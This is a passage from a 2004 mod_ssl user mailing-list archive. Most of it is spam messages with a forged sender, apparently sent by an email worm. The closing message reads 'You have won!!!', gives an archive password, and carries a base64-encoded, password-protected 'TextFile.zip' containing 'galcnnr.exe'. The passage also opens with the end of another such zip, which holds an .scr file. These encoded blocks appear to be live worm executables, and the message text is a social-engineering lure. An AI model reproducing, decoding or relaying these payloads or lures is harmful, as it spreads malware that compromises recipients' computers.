hbj9h3xZjNcW7VtLL/BmCHNnuJesy/zyh4LO0qunn9rsVGtXG1pK9FRNzKAX1b/mmoFX1IXB
6fJRKqmEWmEHcJ1XEB2rG3eOEahe5g05fYz0fVnJKYaU8JjSplWRbwRbm6EV6hYmi4VKwzB3
ny9KZK8vd72n5M8xUVufKEzMIVrElcs4y39qlXaIU+oQjj4ny3SBjbZ/8oLUfCKa8l37yIbm
PR26R6klqQPGE3C3XczsU9cclP8m0nnjx6Jx12Q/saUWUY/LpoGcSc1rUZVOYILowGF8v02M
YtnCHYHE2qdpFQGtqu26deHKzUh8GBzxZC9NOUNRWdIiUYDe9RgjQdf+DEGIw5QND9IKdi1B
9Ca0jiqUJJhACmg/Y4TfQeub0e8SHKiPOSrwoAJqeIagTajzHisD6Qv5K8HoC0nFuZ+J1NLS
5p+sq21+WFzt/MrwsAVqPDG24f6XbKOCl/w3Lh6W3Ln7QWEvuSddrlMl+jxI6rE0q7MhGtGe
fdQ3Vm3gGLeOPdzxCnf7hdpMx6MZhCcKqW8rm5y0+yaHN2OSyHg1IKgEbNMnopwC+5EMZtZb
YREVtAcPJdNmPFxfP82V9/7gjQFEPTOj7MxJcRSfIUq1GaNpLWQTNJ5kK9CnWUkrLPavpHJj
aLwgdC2iodeoPb6iyq+iS63FEDhYwJ031NIqQFE4T/o8uHPBl6a5Y/dAMGIss0hFkJe2y4FI
la/D33SxmRHCjZdZk/OvhywN2OGMl3NrL/TzLIxDZMWreK9OFhmg0+hmBde+E+DOLnnjBHY5
LSUP3ICKhu6KVWiKxIwLFw3/yKihsum/DncggAj+/a3fSQ6YE1/VrGU/D4iMBAzsZk2XXYOA
yRm/5apmESV9Kv7ofMwtFK10dziotGW5R+2dscDEk+hnrNpohljJrW0wEvkVox8fI7n7AlAL
KRwYeZTqciGMtl6Q/GNKwMYKQGFufHR+Fffdl3MOzXKl2eXW/SF3ZUNqzsaEcYLcjJFvMXYE
OotKRZ59BlxnamnPnCUYZPgQq/3JqhRY8Q2OAH0FDVE1+TCg9WrkXvQyRNmKiPQLEQ6dH4M/
VNuXhp8GuO5Viy1X88YPVYXl6JPTH/vxBcO1lMaYKm9NCtIepVeqs12ak/WxMwqaVP2+ncoQ
A97cBQGkgZFp0IaSQOcwdAW/TI8tH8jCu4RynSB+vCUzt2ZU2R5/Ymd7ueSGA9UX/osaUUf6
KGcbph/by0aXH0dULgpH5MsTESWJLWwqX9wJa4iFY22tDVMtYUoqv6PiUCkQl98ZmnhlIcYg
ksxzCC76yHWV4UVMGV+5CRuKanPzd75W/yjNCaXV2ETqPkVyW8ICUXkRC8DFaR0AbMMjioO5
g3tiGWt4z0bN+nb9MJi0QiUnvKuxGXxRr1iLgzn5Wuwedho4eadP1MpHcZ0bWZvAgv0cSWEh
zv7U8PcIXHaApHXUTbU9Eqkq4FQRMrR9D8MnTkQV33b5B4AHn2Gpke10PMGBSm+TYSium3Vi
F+ldv7qr53lKvzJJpJBlvGySSUfdAX+pKps5YViK0Ku+YVmtTuid8g2joPoMbNZEc08PErpr
bNJ0Vm/iRdTUoZz/6LqkDygKtDizDi87AGTVTG9XxiEyG85BLtJ83HAxQhNjWkvtpvY8bogk
OkctAIOdXhVMatQAu+DWhUhwcMQI1YBs7k2zf+c9C/fmCJWwlTAlGjm0AP0DLWjpZlYiLHao
N58qj749Vn+2QKDidlNcuJbsBEOlqyEIl/H5WVXK6Pbjj4b/f/IKpAfxTQA654WYIJjmCjs+
BfAUrS4kLKHQvY01hoB79tXznI256E3pzsiqHaOgyQI5t8Fy21csLELJ0Xb2m0DiojEpFDHa
ZbwGnz83VcV+8dY3nCIrYcE708y21BLFcnr69qJWub+hIWVLKZaaNZMdGSCNcNUmxb1VHbjG
dOPlslDS0uYPkcOlLhLA56AMs2zD2d7TNxbqbFYdhAGLw7DANB9gs94Jea/RWfGEL4Mwg+4c
QyjIbqcf/fxtzIhQcgkXZfQVH16FvGHIJabvGDUIzvdGKbn5+rsXpK6/4JFRnvIrA/kL9IHw
vOwGPRgD/IuQtM4Tefcf86ilpMjRjvK0ZP56AcIP9gXfvXmgkTFlEcGX9caZhS+guM6h5Jne
OSJaz/3SuHGbj579VkeP99/RP5U7t6PI0ONLTJi/8C/izpJWXdIK5sfajyJOSd4gKq78dRlS
z8ow56hoesCsSYupMMJCbPt9mW6JkQmb755UNxzAotC2RIjogLRZvgUyJR5mRreftItjm0Si
h8/IsE/IeMssYv8oBgXySJvC13+d0amB3F4btXR5jbkRZztAStNp38T1VoetU95Jc1eKXysu
eTqK52WhkSmgiFJCkgj99XObXTkdD44GR707uKtNXv4rzUYeclQgjMbtigDrgd8agk41sqJP
Fm67abbKSDOQbMLLjOr+yxYOiX9Cij4yNp/lI9IhxjllTzwxiSkFw9VmDgl8qrS2NYDbITLF
TvzCye0CqKxqq4m2f8hEnXcY6BYd92JVFejYlIiYdzjZjXtwJSzPilpJYtUujK4Q/UJV01N3
RhC8DL/4iPMP1RGs54TCeijsljLkT9vhDF5S+x8Ht6FAzXXVFyzXIp+RQNh5qSb0NbM2n+oZ
c9Z7ichY/KI16deLmVkgyA2DTSgDSZTQnsS/gZTsgiY5NFkAQy+O/RIN4i7KyumcYewc5ykW
v/RLjHMygOsCQqvBUXaMzcBRh/VV1HGD0GFNfvHphqloTu/R5GM+Uf2VXbUlOzJjJ5dbTFxV
KM33WVe57FgjqmqK70R6QQX6CD3IcKT1hZPLQOGxq83WjcXL48EVNF20fiPCvkE0YQuKd34u
K1zJzTow3QqRMM6QAO2/99RH+FzGZuyDCrtQ8kC/uM32l10i1ZB+RISK8zzMrcw4tnfdLcKi
itCcYufO7/TddZzx/m201RkIJ/zga2/nT4kSPL0QtygLi6IYsqJZx/Jujx10z20ZqoY133xZ
I5ugs/r7Oqno5LPOa5BBHGcYLBLtLD+DsWQFQDic/TfY0ubFTwCvPZXFKFYoWXZMFXGTmrUA
SIBaHbqSfskXpzHB8HWpBQj1QFVwbl+q9SqVNW6uL6dTy6yeJxANhV7BjPfjUZIlMeEaXwD1
c+QarLEw8uUxeHvqEAgVATIapPBvF/AAFHgzWlK5b26Tf1joA+vvz2vZFjSSQVlTiJjnRHBY
JKk7KmZtYafBAQ/NM0k0MagIrJRtn6zj20IfMjCGrsp9O+3la2rCczV9xP5OLJopDb4PpzV+
oIjRT8x9ryjd8+/63IZG9UNuOYn1k4lO9cbYTnQ41N7D556mb41Gszd76xNit5dAZZjElZg9
1HX/O+4EjsIqVo3z9dM1wdhmB1p+iVityU63/Z0lkPQIKeSHWiaAd4LAofCyePoSxQQa2+WA
etAt/O4ekJRzsGQriNWDk4yvTnuXSBT17QKMCxkXqrx96m4LDixjjFCkA9Vu8qvqH+tP/4j7
tzif55wNgDrd5pPS/Uq3s3E9IiNCylNG4YRqmusI5Wo2+etTvXIFpXPvyPnXkXStmWBxVb4i
AzqMIsyBsxjyX4WOm3PYZTpGX2z+h2yYfFN+G869S5rcPJoDHG32PNq5yOsl0s53TyA1zVxY
/5XOtJrNMFjjH69UUrrPrPo1VWTRJ5OFKiGSHvBzQZmu9B2eKZAz8HvdLR5tYidq9gh/Z0JT
UZQUOtV8RdluK8DsX880kBFaomb4MP5XjB9j4fYdN4x2gnjHCIQYIetOWD7H88AoBGG/vJWZ
E/ZtYlBvn2pi5ut/jAfTe5MTBydSeg7aVa6LLB+86Tmwtj3bM8fSlVCepzilfqkf/beAiam8
gk167ayS0r3Cjtn+K6iITpcH8pNHT7rzVJq+UBAZNvC6FjvnwwCN7lStuxGSPfvuzeuNQwgX
+fCY03nNkFpSoOhZf25a3Gyyov3XquScU7+hh1rKZ9pii9H2b7P2lqnfKnyzJieFl887qp/h
ho/GN5uAwfqjw7XrRswaTC+zWfpqZM2IlfC0rO1zNjmrfJzGdwrFz2uAv6OTBAXuYjr1+Vwx
p+gq0tnAElC+jH/jxs9NDqBsKQtleuWjBglblU7O0OhEb1RWFaTM+Q/AcRgdBM/TNj488cBZ
g5doyostp2fQZdPKedkPonn30IcEANcOHmvY1yNGrtaAgnLtTV/8E+MMJmY7uf4FR2lqQbiq
81ofIkR+RCRboHyALOitlM0Y3BbTI8litZFWTmuig9txUhd6IJbuTn9gqJ23M2OEcYbHem5x
SA4Fvt8TPA5VjH9ouTmzMqpS3mh+n/1zdtaOss66t3tertay+QYv0NzhN7oOtlbXQ63usC/3
6ZkurfIFrdDWZY5l2IIli2WqKtqXacqGCVjahzjeBc6k5fveRm+2eeqOn+d4fPeUC0wyLyeY
XcRqf7MUmVwIrdV6s7AlCJ+KmhsiZhuVCcI82+03L1Tl+limgvIXEcW9Bfzuhuw4YFeJuHLt
PGHu3CZi8Ju7P41VJ7JGKsvM8BVuXg6PkwatHCw0fdFKXxHjyD7ViFiS4CbL/p6tTTf6sGMj
r4cG2pvUd5XOyT+3C6qmCmYpXHr/Hy87+xyG1h6ff9rgiuo0F/0GOyEqbx/Mw6mj2SAMsAv3
OIuFqYaUtDolPfmtvA5clZI/RbEwEuZ2uyyT9dBEmJVx2oAzUS2AM7kxGqbJVwjGFvalcbIY
2KeBQca7ml3xkAyw4FMKg2Hv+DYLI/3V/+Oj5JNn6Gs0svfgt6UjnmHuKN73XNMUMknOErpv
3t9LEEk35jasTub2mm/hmYOozspHSGpa8AUezRpYgkry8rrYGIBtp/HRAP2ER1SIq6DWhYwc
ohsQ6YxvjJ7Fsr4AGWzXvxm5IhWnTzXzakIZN3LcEfjg80D6G6v9WRgbhiyLlyiEXTtSzBTs
XPzus1Hp3bBe331hcNwxOE6Madu6gBNiK+xqDxHC7LAAwK8LW9dRmJBeauCX43YMCrOFf2vp
oyUZGFwsM6S4dBJYGSOFkHO3idBfcT0nVk5ptdX3pOtJ+OaoOrQQwrD96nE2lInGTe4qwIdc
Lnq7iifmiJiQyWvcaLRP78lzV+e78KZrXYzo26GcUeFWxTL8lt0XdxabmjF8EFA/Pvx5rrb+
h4r03gT5K11uNcP+AIR5kZRfnH4QTptFVEgI2ArrZEfrKDrLClHBuxk6oFZiwRijX5FTUD6Y
WHhblE26dWMeBfpfvvh9eMEn9M1pNew6Rf8pIT3dfJccuOSH+CP9oijy0ScD1O+37wt8D2ec
4mk0bKmBOP/TMV7C8RKRdEU0FDg1nBAFQ8RG4/nebdacd52/JSlPhz92T4yaBhIucls1RyQJ
nPcOBYdxSrWkJ+WnVoVT8ciwKQqP9VV0on6KWiOoiP1GagXIy+nM+hFUHtiEwldS1vHpknWR
LjRmuvn+YvdlUHyU6iaFSQxB7A0hNjkIowgMw9RLh648mrGtfP7ZiSfrjPhqI3k/X00gy4c6
FgVr4nWFCeTI1Lz+IQ/xaWDYSjXnjPEG/97eq1r1SLBp+h2LrBjlNljn98BeRQKUQyPyP/eO
GLQb83av7G2l7UHT0fTDMLA4F32ay+mANqDfAuSu3JOVTPAWbDLk91hwdo6+82kWhUHNz8fH
6qNu9ivUiks1GiQ+LZCQzT2VccO5CEhITdi6cEF8442Risi7zCfcpthXH/5CXbxN3N2LnQBw
IwH/JjRi6gM9Zc4xsDkeWtTmSCi4/ydelMxsVFTjaEp5CMxoByqujuiZgZsz3xcSKY2pyXvo
ZZUT2Ui12NQ16qSOw3+VYF3QmKjzGFUhjfVdp2LiprXYr4v+14u84Rzlnnb83RcBoMg3FSAa
rPqS0beMt/vBWcpHVfnTvTFjcl5QrYjwBU7V+BDLUSd/nlEkjIuG7L+dLna5ZMRMSXwsxC1K
QFySrvj2ZCIcQg1wDJfND54MA4i2jMZ4Ygnl++vGfqNAT+x//MTZSQ1jVx69JrBgE6aIEVy7
caaHxOHGj7csKSR6vgeLJ1ei+2G0rJJRvkRToqHAc9dBFzwtfi/hvh90P8KOUEsBAhQACgAB
AAAAAJliMJglts1gUAAAVFAAAA0AAAAAAAAAAQAgAAAAAAAAAHlxeG94a2Ridy5zY3JQSwUG
AAAAAAEAAQA7AAAAi1AAAAAA

----------gotstpundrthtarwfggb--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  3 01:04:00 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 49D7EA8A49; Wed,  3 Mar 2004 01:04:00 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rhinegold (dsl-217-155-42-7.zen.co.uk [217.155.42.7])
	by master.modssl.org (Postfix) with SMTP id 048C6A8945
	for ; Wed,  3 Mar 2004 01:03:58 +0100 (CET)
Date: Wed, 03 Mar 2004 00:05:05 +0000
To: modssl-users@modssl.org
Subject: Hey, ya! =))
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------gjtjaussctmdxtxjhgct"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------gjtjaussctmdxtxjhgct
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

You have  won!!!
 
42641 -- archive password

----------gjtjaussctmdxtxjhgct
Content-Type: application/octet-stream; name="TextFile.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="TextFile.zip"

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
